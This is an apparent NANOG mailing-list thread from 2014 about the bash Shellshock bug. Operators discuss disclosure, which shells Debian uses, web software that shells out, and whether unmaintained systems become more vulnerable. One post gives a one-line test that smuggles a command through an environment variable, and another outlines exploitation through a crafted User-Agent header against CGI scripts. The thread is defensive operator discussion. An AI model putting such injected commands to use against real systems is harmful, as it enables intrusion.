there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
Can I presume you’re talking about the bash CVE-2014-6271? - jared
On Sep 24, 2014, at 3:05 PM, Randy Bush <randy@psg.com> wrote:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
See: http://seclists.org/oss-sec/2014/q3/650 Regards, SG On 9/24/2014 1:05 PM, Randy Bush wrote:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
sigh. i am well aware of it but saw no benefit for further blabbing a vuln randy
Keeping silent after the embargo is over isn't doing anyone any favors. I think Florian said it best in his most recent message: "In this particular case, I think we had to publish technical details so that those who cannot patch immediately can at least try to mitigate this vulnerability using filters on devices in front of web servers, or tools like mod_security. And without the technical details, I doubt this vulnerability would have received the attention it deserves until someone figures things out. We could easily have obfuscated the patch to delay this, but what's the point?" For anyone that would like to see if a system is vulnerable: |env x='() { :;}; echo vulnerable' bash -c "echo this is a test"| If you receive the echo output, your version of bash is affected. Regards, SG On 9/24/2014 1:10 PM, Randy Bush wrote:
See: http://seclists.org/oss-sec/2014/q3/650 sigh. i am well aware of it but saw no benefit for further blabbing a vuln
randy
when do you think the embargo is over?
ref: http://seclists.org/oss-sec/2014/q3/650 "At present, public disclosure is scheduled for Wednesday, 2014-09-24 14:00 UTC. We do not expect the schedule to change, but we may be forced to revise it."
Date: Wed, 24 Sep 2014 15:07:26 -0400 From: Jared Mauch <jared@puck.nether.net> To: Randy Bush <randy@psg.com> Cc: North American Network Operators' Group <nanog@nanog.org> Subject: Re: update X-Mailer: Apple Mail (2.1985.4)
Can I presume you’re talking about the bash CVE-2014-6271?
Date: Wed, 24 Sep 2014 13:09:19 -0600 From: Spencer Gaw <spencerg@frii.net> To: Randy Bush <randy@psg.com>, North American Network Operators' Group <nanog@nanog.org> Subject: Re: update User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Thunderbird/31.1.1
Both are > 2014-09-24 14:00 UTC by my count. Unless the embargo got extended? On Thu 2014-Sep-25 13:05:45 +0900, Randy Bush <randy@psg.com> wrote:
Keeping silent after the embargo is over isn't doing anyone any favors.
when do you think the embargo is over?
yes, it got blabbed. but that does not mean one should be a blabber.
randy
-- Hugo
Does anyone know if there is official/unofficial vendor/manufacturer list yet to all their official Vulnerability webpage info? I thought I saw some when Heartbleed broke out. -- Later, Joe On Wed, Sep 24, 2014 at 9:41 PM, Hugo Slabbert <hugo@slabnet.com> wrote:
when do you think the embargo is over?
ref: http://seclists.org/oss-sec/2014/q3/650
"At present, public disclosure is scheduled for Wednesday, 2014-09-24 14:00 UTC. We do not expect the schedule to change, but we may be forced to revise it."
Date: Wed, 24 Sep 2014 15:07:26 -0400
From: Jared Mauch <jared@puck.nether.net> To: Randy Bush <randy@psg.com> Cc: North American Network Operators' Group <nanog@nanog.org> Subject: Re: update X-Mailer: Apple Mail (2.1985.4)
Can I presume you’re talking about the bash CVE-2014-6271?
Date: Wed, 24 Sep 2014 13:09:19 -0600
From: Spencer Gaw <spencerg@frii.net> To: Randy Bush <randy@psg.com>, North American Network Operators' Group < nanog@nanog.org> Subject: Re: update User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Thunderbird/31.1.1
Both are > 2014-09-24 14:00 UTC by my count. Unless the embargo got extended?
On Thu 2014-Sep-25 13:05:45 +0900, Randy Bush <randy@psg.com> wrote:
Keeping silent after the embargo is over isn't doing anyone any
favors.
when do you think the embargo is over?
yes, it got blabbed. but that does not mean one should be a blabber.
randy
-- Hugo
fsf put out a statement https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shel... -- --------------------------------------------------------------- Joly MacFie 218 565 9365 Skype:punkcast WWWhatsup NYC - http://wwwhatsup.com http://pinstand.com - http://punkcast.com VP (Admin) - ISOC-NY - http://isoc-ny.org -------------------------------------------------------------- -
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. On Wed, Sep 24, 2014 at 6:11 PM, Jim Popovitch <jimpop@gmail.com> wrote:
debian/ubuntu admins may want to apt-get update/upgrade or whatever
debian/ubuntu aren't really all that immediately impacted.
$ grep "bash$" /etc/passwd | wc -l 2
^^ both of those are user accounts, not system/daemon accounts.
-Jim P.
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable.
Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho. -Jim P.
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com> wrote:
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This is already made it to /. so I'm not sure why Randy was being so hush hush... But my read is that this could affect anything that calls bash to do processing, like handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive though any unix disto, in not at all obvious places, so I wouldn't be complacent about this at all. Mike
On Sep 24, 2014 6:39 PM, "Michael Thomas" <mike@mtcc.com> wrote:
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com>
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable.
Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This is already made it to /. so I'm not sure why Randy was being so hush hush...
But my read is that this could affect anything that calls bash to do
wrote: processing, like
handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive though any unix disto, in not at all obvious places, so I wouldn't be complacent about this at all.
Mike
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script). But I do agree, it's hard to know exactly what idiots do. :-) -Jim P.
On 09/24/14 18:50, Jim Popovitch wrote:
On Sep 24, 2014 6:39 PM, "Michael Thomas" <mike@mtcc.com> wrote:
On 9/24/14, 3:27 PM, Jim Popovitch wrote:
On Wed, Sep 24, 2014 at 6:17 PM, Brandon Whaley <redkrieg@gmail.com>
The scope of the issue isn't limited to SSH, that's just a popular example people are using. Any program calling bash could potentially be vulnerable. Agreed. My point was that bash is not all that popular on debian/ubuntu for accounts that would be running public facing services that would be processing user defined input (www-data, cgi-bin, list, irc, lp, mail, etc). Sure some non-privileged user could host their own cgi script on >:1024, but that's not really a critical "stop the presses!!" upgrade issue, imho.
This is already made it to /. so I'm not sure why Randy was being so hush hush... But my read is that this could affect anything that calls bash to do
wrote: processing, like
handing off to CGI by putting in headers to p0wn the box. Also: bash is incredibly pervasive though any unix disto, in not at all obvious places, so I wouldn't be complacent about this at all.
Mike If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script). But I do agree, it's hard to know exactly what idiots do. :-)
Maybe just mis-informed, they become idiots if they keep doing it after someone pointed it to them =D
-Jim P.
On Wed, 24 Sep 2014 18:50:05 -0400, Jim Popovitch said:
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI script).
You sure you don't have *any* cgi's that do something like system("mail -s 'cgi program xxyz hit fatal error' webadmin@localhost"); because all it takes is finding a way to force the fatal error while you send a crafted User-Agent: header.... As Jim Popovitch said, bash usage is incredibly pervasive....
On Sep 24, 2014 7:00 PM, <Valdis.Kletnieks@vt.edu> wrote:
On Wed, 24 Sep 2014 18:50:05 -0400, Jim Popovitch said:
If someone is already invoking #!/bin/bash from a cgi, then they are already doing it wrong (bash has massive bloat/overhead for a CGI
script).
You sure you don't have *any* cgi's that do something like system("mail -s 'cgi program xxyz hit fatal error' webadmin@localhost"); because all it takes is finding a way to force the fatal error while you send a crafted User-Agent: header....
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells.... -Jim P.
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
-Jim P.
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts. Daniel
Once upon a time, Daniel Jackson <fdj@mindspring.com> said:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
It doesn't have much to do with default shells or system account settings; it has everything to do with what is /bin/sh. I think /bin/sh has been dash (derived from NetBSD's Almquist shell) on Debian-derived systems for a while now. Other major Linux distributions, e.g. RHEL/Fedora family and IIRC SuSE, use bash as /bin/sh though, so should be patched ASAP (especially if they are web servers). Has anybody looked to see if the popular web software the users install and don't maintain (e.g. Wordpress, phpBB, Joomla, Drupal) use system() or the like to call out to external programs? What about service provider type stuff like RT? I know Nagios calls out to shell scripts for notifications and such, and passes some things in environment variables (don't know if it can be tricked in this fashion though). -- Chris Adams <cma@cmadams.net>
On Wed, Sep 24, 2014 at 7:41 PM, Chris Adams <cma@cmadams.net> wrote:
Has anybody looked to see if the popular web software the users install and don't maintain (e.g. Wordpress, phpBB, Joomla, Drupal) use system()
Wouldn't it be great if it was JUST system()? It's also popen(), shell_exec(), passhru(), exec(), backtic operator. I am pretty sure ALL of them use at least 1 of these in various places out of the box, and many plugins use these as well, such that a shell could be invoked, but popen() on $sendmail is particularly common.
or the like to call out to external programs? What about service provider type stuff like RT? I know Nagios calls out to shell scripts
-- -JH
On Wed, Sep 24, 2014 at 7:36 PM, Daniel Jackson <fdj@mindspring.com> wrote:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
You're both wrong. $ cat /etc/issue Debian GNU/Linux 7 \n \l $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Nov 17 2011 /bin/sh -> bash* $ grep root /etc/passwd root:x:0:0:root:/root:/bin/bash If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no. Welcome to production fellas, where the bleeding edge latest thing isn't what's installed. Regards, Bill Herrin -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:29 PM, William Herrin <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 7:36 PM, Daniel Jackson <fdj@mindspring.com> wrote:
On 09/24/2014 07:22 PM, Jim Popovitch wrote:
That won't automatically invoke bash on Debian/Ubuntu....unless someone intentionally changed default shells....
People seem not to know that Debian and derivatives use a variant Almquist shell rather than bash for system accounts.
You're both wrong.
$ cat /etc/issue Debian GNU/Linux 7 \n \l
$ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Nov 17 2011 /bin/sh -> bash* $ grep root /etc/passwd root:x:0:0:root:/root:/bin/bash
You have done something wrong/different than what appears on a relatively clean install: $ cat /etc/issue Debian GNU/Linux 7 \n \l $ cat /etc/debian_version 7.6 $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash* $ grep root /etc/passwd root:x:0:0:root:/root:/bin/sh I'm curious now... did you install a server or desktop version of Debian? Was if from netinst or cds, etc.? -Jim P.
On Wed, Sep 24, 2014 at 10:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
Since you didn't read it, I'm gonna repeat it: "If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no. Welcome to production fellas, where the bleeding edge latest thing isn't what's installed." -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:49 PM, William Herrin <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 10:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
Since you didn't read it, I'm gonna repeat it:
"If you installed Debian from scratch in the last couple of years you might have gotten a different system shell. Those of us who have been using Debian for a *long time* were asked once during one upgrade whether we wanted the upgrade to change our defaults and generally said no.
Welcome to production fellas, where the bleeding edge latest thing isn't what's installed."
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC? -Jim P.
On Wed, Sep 24, 2014 at 10:52 PM, Jim Popovitch <jimpop@gmail.com> wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I've been running Debian for longer than the dash shell has existed. What do you imagine the default shell was back then? Definitely PEBKAC. You just picked the wrong chair. -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Sep 24, 2014 10:56 PM, "William Herrin" <bill@herrin.us> wrote:
On Wed, Sep 24, 2014 at 10:52 PM, Jim Popovitch <jimpop@gmail.com> wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I've been running Debian for longer than the dash shell has existed. What do you imagine the default shell was back then?
chisel & stone? :-) j/k I'm probably also old enough to remember, but I don't really care to.
Definitely PEBKAC. You just picked the wrong chair.
I'm seeing that. -Jim P.
On Wed, 24 Sep 2014, Jim Popovitch wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I can verify Williams settings on my Debian system that was initially installed back in 3.x days or so, probably around 2005 or thereabouts. My root shell uses bash and /bin/sh points to bash. I probably received a question about this sometime long ago when upgrading but I guess I answered no. -- Mikael Abrahamsson email: swmike@swm.pp.se
On Thu, Sep 25, 2014 at 05:11:22AM +0200, Mikael Abrahamsson wrote:
On Wed, 24 Sep 2014, Jim Popovitch wrote:
I *did* read that, and it doesn't change anything about what I wrote. Debian didn't make those changes for you...... Debian has never set root's shell to bash, ever. PEBKAC?
I can verify Williams settings on my Debian system that was initially installed back in 3.x days or so, probably around 2005 or thereabouts. My root shell uses bash and /bin/sh points to bash.
I haven't administered many Debian / Ubuntu systems recently, but I did during the days of hamm / slink / potato, and my recollection is that the *default* /bin/sh in 2.x and 3.x was bash, though it was possible to configure the system to use ash or something lighter weight instead. Doubt I currently have access to any systems that old, but: % cat /etc/debian_version 5.0.4 % ls -al /bin/sh lrwxrwxrwx 1 root root 4 2009-03-05 16:58 /bin/sh -> bash* % which dash dash not found $ cat /etc/debian_version 5.0.9 $ ls -al /bin/sh lrwxrwxrwx 1 root root 4 2010-08-02 12:21 /bin/sh -> bash* So, I think "never... ever" is maybe not quite correct. w
On Wed, Sep 24, 2014 at 9:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
$ cat /etc/debian_version 7.6 $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash*
What is this fabled 7.6 that you speak of? :) :~# cat /etc/debian_version 4.0 :~# ls -ld /bin/sh lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash -- -JH
On Wed, Sep 24, 2014 at 10:56 PM, Jimmy Hess <mysidia@gmail.com> wrote:
On Wed, Sep 24, 2014 at 9:43 PM, Jim Popovitch <jimpop@gmail.com> wrote:
You have done something wrong/different than what appears on a relatively clean install:
$ cat /etc/debian_version 7.6 $ ls -laF /bin/sh lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash*
What is this fabled 7.6 that you speak of? :)
:~# cat /etc/debian_version 4.0
:~# ls -ld /bin/sh
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :) -Bill -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> Can I solve your unusual networking challenges?
On Wed, Sep 24, 2014 at 10:03 PM, William Herrin <bill@herrin.us> wrote:
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :)
Not a live system, but aside from honeypots, there really are embedded appliances and companies with websites still in production based on LAMP installations on Etch and Lenny. I understand the dash shell wasn't introduced until Debian Squeeze (6.0), which is in the past 4 years.
-Bill -- -JH
On Wed, Sep 24, 2014 at 11:19 PM, Jimmy Hess <mysidia@gmail.com> wrote:
On Wed, Sep 24, 2014 at 10:03 PM, William Herrin <bill@herrin.us> wrote:
lrwxrwxrwx 1 root root 4 2014-02-22 11:52 /bin/sh -> bash
ROFL. Jimmy, please tell me you had to start up a VM to check that. :)
Not a live system, but aside from honeypots, there really are embedded appliances and companies with websites still in production based on LAMP installations on Etch and Lenny.
Lots of small embedded Linux systems (e.g. your home router), are *not* vulnerable to this particular problem. An quick glance at 6 reasonably current home routers shows all are using the "ash" shell, rather than bash, as it is much smaller and part of busybox, which most of these devices use. That being said, there are many, many other serious vulnerabilities in that class of device, compounded many times over by the fact that most lack any sort of update stream, and usually require manual update, if ever new firmware does become available. Those of you unfamiliar with The Moon worm should familiarize yourself with it. Consider it a shot across our bow.... For those of you who want to understand more about the situation we're all in, go look at my talk at the Berkman Center, and read the articles linked from there by Bruce Schneier and Dan Geer. http://cyber.law.harvard.edu/events/luncheon/2014/06/gettys Jim Gettys
On Friday, 26 September, 2014 08:37,Jim Gettys <jg@freedesktop.org> said:
For those of you who want to understand more about the situation we're all in, go look at my talk at the Berkman Center, and read the articles linked from there by Bruce Schneier and Dan Geer.
Unfortunately, that page contains near the top the ludicrous and impossible assertion: ""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time." It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time". The fact that the folks in the next building can peep at your privates through the bedroom window on which you did not install blinds does not mean that the vulnerability only exists from the time it is published in the local tabloid -- it existed all along -- it did not "magically" come into existence at some point after the building was built, the window installed, and you moved in without putting up windows blinds. The fact that you did not become aware of it until you saw a photograph of yourself doing unmentionable things only serves as the point in time at which you became aware of your failure to properly assess the posture of the system in the first place.
Jim Gettys
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
Unfortunately, that page contains near the top the ludicrous and impossible assertion:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
That's not actually true. A running process, instantiated from a file of object code, derives its behavior from a number of interfaces; to the kernel, the libc, the filesystem of the machine it's run on, and even network interfaces off the machine. While the device itself may be -- or seem to be -- immutable, unless you're certain that *nothing around it changed either*, then you cannot assume that things became vulnerabilities *as deployed* which were not so previously. Ok, yes, that's partially equivalent to what you said, at least in the case of, say, consumer routers, booting from flash. But for code running on real OSs, it's possible for a vulnerability to "appear" because something under or beside the code got updated, turning something which could not be attacked into something which could. I haven't an example case, but it is theoretically possible. Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
On Sat, Sep 27, 2014 at 8:10 PM, Jay Ashworth <jra@baylink.com> wrote:
I haven't an example case, but it is theoretically possible.
Qmail-smtpd has a buffer overflow vulnerability related to integer overflow which can only be reached when compiled on a 64-bit platform. x86_64 did not exist when the code was originally written. If memory serves, the author never acknowledged the vulnerability and declined to pay bounty or fix the bug stating that nobody allows gigabytes of RAM per smtp process. However.... you see, there you have a lingering bug that can be exposed under the right environment.... (Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?) -> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
Cheers, -- jra -- -JH
On Saturday, 27 September, 2014 20:49, Jimmy Hess said:
On Sat, Sep 27, 2014 at 8:10 PM, Jay Ashworth <jra@baylink.com> wrote:
I haven't an example case, but it is theoretically possible.
Qmail-smtpd has a buffer overflow vulnerability related to integer overflow which can only be reached when compiled on a 64-bit platform. x86_64 did not exist when the code was originally written.
If memory serves, the author never acknowledged the vulnerability and declined to pay bounty or fix the bug stating that nobody allows gigabytes of RAM per smtp process.
However.... you see, there you have a lingering bug that can be exposed under the right environment.... (Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?)
-> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
** the person making the change in this instance is referred to as "you". This is not to imply that it is any of you personally, but simply because it is easier to write using that pronoun rather than figuring out an appropriate third-person descriptive. I personally think "the retard" is most appropriate, but then that is just me :) In this case however, you have implemented a change and it has changed the vulnerability profile. Presumably at one point you were running Qmail-smtpd on x86 (32-bit). You introduced a change (x86 -> x64) which changed the vulnerability profile. Perhaps you implemented two changes -- one to an x64 kernel, and second to an x64 userland. Whatever the case, there was still a change, and it was only because of the change that the vulnerability manifested. If you had not made the change, you would not have introduced the vulnerability. That your assessment of the change in vulnerability profile resulting from your change was defective is the whole point of this discussion. If you had been rational about the change to from x86 -> x64 and 32-bit userland to 64-bit userland, you would have limited all processes to the same per-process address space as they had in the x86 model in order to prevent the introduction of vulnerabilities such as this, and only permitted larger address spaces for processes that required them (ie, were part of the justification for making the change). If the change was "thrust upon you" with no justification, then the "thruster" should be terminated (with extreme prejudice, if possible). Notwithstanding, if you are responsible for the Safety and Security of the system changed, you should go stand in the corner for failing to perform your job adequately, or perhaps be promoted to management where you will no longer be a threat. And the assumption about "(Year 2030... computers have Petabytes of RAM... why would you seriously limit any one process to less than a terabyte....?)" implies that there is an intent to implement further change. Before you make the change to "computers having petabytes of RAM" and "not limiting any process to less than a terabyte of per process address space", I would hope that you would assess the impact of that change. Especially since you now have additional information on which to generate a more accurate assessment of the impact of making that change, and what mitigations you should put in place when you make that change to prevent yourself from being either terminated with extreme prejudice or promotion to management (unless, of course, those are your goals). One of the reasons for "limiting a process to less than a terabyte of process address space" is that it may lead to the manifestation of vulnerabilities such as the one discussed here. My original proposition still holds perfectly: (1) The vulnerability profile of a system is fixed at system commissioning. (2) Vulnerabilities do not get created nor destroyed except through implementation of change. (3) If there is no change to a system, then there can be no change in its vulnerabilities. Of course, you must set the boundaries of "system" correctly. Choosing the wrong boundary may cause you to mislead yourself as to what a particular change may impact.
My original proposition still holds perfectly:
(1) The vulnerability profile of a system is fixed at system commissioning. (2) Vulnerabilities do not get created nor destroyed except through implementation of change. (3) If there is no change to a system, then there can be no change in its vulnerabilities.
Your original proposition is pointlessly academic. Yes, given absolutely no changes to the system, it's vulnerability profile does not change. Does your "correct" system boundary include the file system? So you're definition of an unchanging system only uses read-only file systems. Does it include the system's load average? Can't ever change the number of clients connected to it... Does it include the system's uptime? Etc. So yes, you're right. The number of existing vulnerabilities in a system never changes. It's just that you've also ruled out every system I can imagine being even remotely useful in life, so your argument seems to apply to _nothing_. What does change for a system is the threat profile as exploits become better known. Arguing that it is better to blissful march onward with what is *known* to be a vulnerable system instead of rolling out stable branch security updates that *generally* contain less bugs demonstrates a lack of pragmatism. I'm sorry that someone on the Internet hasn't precisely used your made-up distinction between a "vulnerability profile" and the actual threat level given the current state of the rest of the universe. We really don't need to be splitting hairs about this on the NANOG list... -- Kenneth Finnegan http://blog.thelifeofkenneth.com/
On Saturday, 27 September, 2014 23:29, Kenneth Finnegan <kennethfinnegan2007@gmail.com> said:
My original proposition still holds perfectly:
(1) The vulnerability profile of a system is fixed at system commissioning. (2) Vulnerabilities do not get created nor destroyed except through implementation of change. (3) If there is no change to a system, then there can be no change in its vulnerabilities.
Your original proposition is pointlessly academic. Yes, given absolutely no changes to the system, it's vulnerability profile does not change.
Does your "correct" system boundary include the file system? So you're definition of an unchanging system only uses read-only file systems.
Now that would depend, would it not. If you mean as in storing "data" or processing "data", then obviously not. If you mean the "executable contents" as in "the contents of the filesystem which are executed as part of the system" then obviously yes. Changing the "data" content of the filesystem is, in general, why one would implement a system in the first place. However, changing "executable contents" which are then executed implies a change which must be assessed.
Does it include the system's load average? Can't ever change the number of clients connected to it... Does it include the system's uptime? Etc.
These are only relevant if they are vulnerabilities. If these things are vulnerabilities I should hope that mitigations are in place to prevent them from being exploited, and that these mitigations were put in place from the get-go rather than when they appeared on CNN.
So yes, you're right. The number of existing vulnerabilities in a system never changes. It's just that you've also ruled out every system I can imagine being even remotely useful in life, so your argument seems to apply to _nothing_.
No, it applies to everything. It applies to routers and switches and it applies to Mail Servers, and to everything else. When a network device is implemented everyone makes the assumption that it is, other than its designed function (switching packets), a zero-security device. This is why there is control-plane policing. This is why you segregate the management network. This is why you create isolated management access. This is why you do not open up telnet, ssh, ftp, tftp, http, and whatever else to "anyone" on the internet. If you do this properly, you do not care much about vulnerabilities in telnet, ssh, ftp, tftp, or http because they cannot be exploited (or rather, any such issues can only be exploited by a known set of actors). You have put mitigations in place to address the risks and any possible vulnerabilities. Just because no one has yet demonstrated a vulnerability does not mean that it does not exist. If you have done this properly (ie, you acted prudently), you no longer care whether there are vulnerabilities or not, because you already have mitigations in place that would prevent them from being exploited (whether they exist or not). Then everytime you see on CNN that there is a new major flaw in the swashbuckle that can be taken advantage of by a bottle of whiskey, you pat yourself on the back and congratulate yourself having already assessed that there might be a problem in the swashbuckle when whiskey was present, so you already put in mitigations to prevent that. Or maybe you decided that you don't need to swashbuckle at all so you disabled that feature, in which case you don't really care about the supply of whiskey either.
What does change for a system is the threat profile as exploits become better known. Arguing that it is better to blissful march onward with what is *known* to be a vulnerable system instead of rolling out stable branch security updates that *generally* contain less bugs demonstrates a lack of pragmatism.
No, blindly rolling out patches which fix things that do not need fixing is foolhardy. It may very well be that the particular version of IOS running has a vulnerability in the http server portion of the software. However, that service is disabled because after rational evaluation it was decided (when the system was implemented) that the http feature was not required and as part of prudent policy, things which are not required were disabled. Therefore, implementation of the change to fix the vulnerability provides zero benefit. In fact, implementation of the change may have other detrimental effects which I will not know until after implementing the change. Therefore, the cost/benefit and risk analysis clearly indicates that the change should not be made. However, if the change fixes an issue with regards to packet switching/forwarding, and if I am experiencing the issue or might experience the issue, then I should consider applying the change sooner or later, as warranted by the circumstances. On the other hand, if it is impossible for the circumstance to arise which will lead to the manifestation of the issue that is the subject of the change, then I should not implement the change. The same can be applied to "upgrading" to an x64 system from an x86 system. If there is no need driving the upgrade, then why do it? Doing so changes the "vulnerability profile" to something different from what it was, and you may fail to account for all the vulnerabilities in the new profile (for example buffer overflows and arithmetic overflows due to the increased size of the process address space). If the current system is working perfectly and has all the appropriate mitigations in place to keep it safe and secure (in the operational sense), then the cost/benefit and risk analysis clearly indicates that the change should not be made.
I'm sorry that someone on the Internet hasn't precisely used your made-up distinction between a "vulnerability profile" and the actual threat level given the current state of the rest of the universe.
Operations folks make decisions based on the "vulnerability profile" all the time, whether they realize it or not, and generally could care less about the "threat profile". If an operational concern comes about because of a change in the "threat level" then there has been a failure to properly assess the "vulnerability profile" and apply appropriate mitigations; and, that failure happened long before the news hit the mainstream media. It is only if the change in the "threat profile" in light of the existing mitigations already in place as a result of assessing the "vulnerability profile" indicates that a change must be implemented, should a change be implemented. This would also require a re-assessment of the "vulnerability profile" of all existing systems as a result of the new information.
We >really don't need to be splitting hairs about this on the NANOG list...
This may or may not be true. I suspect the density of real Operations folks is greater here than just about anywhere else. (and by that I mean the number of list subscribers that have actual operational responsibilities for keeping things running safely and securely).
On Sat, 27 Sep 2014 22:50:31 -0600, "Keith Medcalf" said:
If you had been rational about the change to from x86 -> x64 and 32-bit userland to 64-bit userland, you would have limited all processes to the same per-process address space as they had in the x86 model in order to prevent the introduction of vulnerabilities such as this, and only permitted larger address spaces for processes that required them (ie, were part of the justification for making the change).
If security was *that* easy, we'd all be good at it. First off, security never lives in a vacuum - it gets to trade off with other concerns, like performance and usability. There are workloads where the fact that x86_64 uses wider variables and thus more memory bandwidth is outweighed by the fact that the increased number of effectively usable registers drastically reduces the number of memory accesses needed. So it's not just about address space. Secondly, if you convert everything to the x64_64 model rather than keeping *two* sets of ABI around, you've just halved your attack surface, and reduced the number of ways you can accidentally mess yourself up by updating the 64-bit library and missing the 32-bit one (or vice versa). And if you've just eaten, I suggest you *not* look at the mess involved in making sure that things like ioctls pass the same structure to the kernel whether they're calling from a 32 bit or a 64 bit binary. So there's a case to be made that if even only *some* of your code needs 64-bit mode, you should cut it *all* over....
